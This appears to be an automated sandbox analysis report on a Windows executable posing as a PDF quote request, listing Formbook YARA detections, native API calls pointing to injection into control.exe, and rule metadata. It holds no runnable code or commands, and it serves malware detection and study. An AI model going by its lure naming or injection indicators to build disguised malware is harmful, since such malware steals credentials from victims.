          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004182DC NtClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007181B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00718260 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007182E0 NtClose,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00718390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007182DC NtClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00408C4B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00408C50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00402D87
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041BD8E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041C5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A920A8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DB090
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A928EC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A9E824
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A81002
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CF900
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A922AE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A7FA2B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FEBB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A803DA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8DBD2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A92B28
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009EAB40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009D841F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8D466
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A925DD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A92D07
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C0D20
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A91D55
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A92EF7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E6E30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8D616
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A91FF1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A9DFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485D466
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04790D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048625DD
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04862D07
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04861D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B6E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04862EF7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485D616
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0486DFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04861FF1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048620A8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048628EC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04851002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0486E824
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AB090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048622AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485DBD2
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048503DA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04862B28
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CEBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00708C50
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00708C4B
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071C5A1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00702D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00702D87
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00702FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: String function: 009CB150 appears 45 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0479B150 appears 39 times
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.647856936.000000001F036000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692313752.0000000002625000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692024635.0000000000C4F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
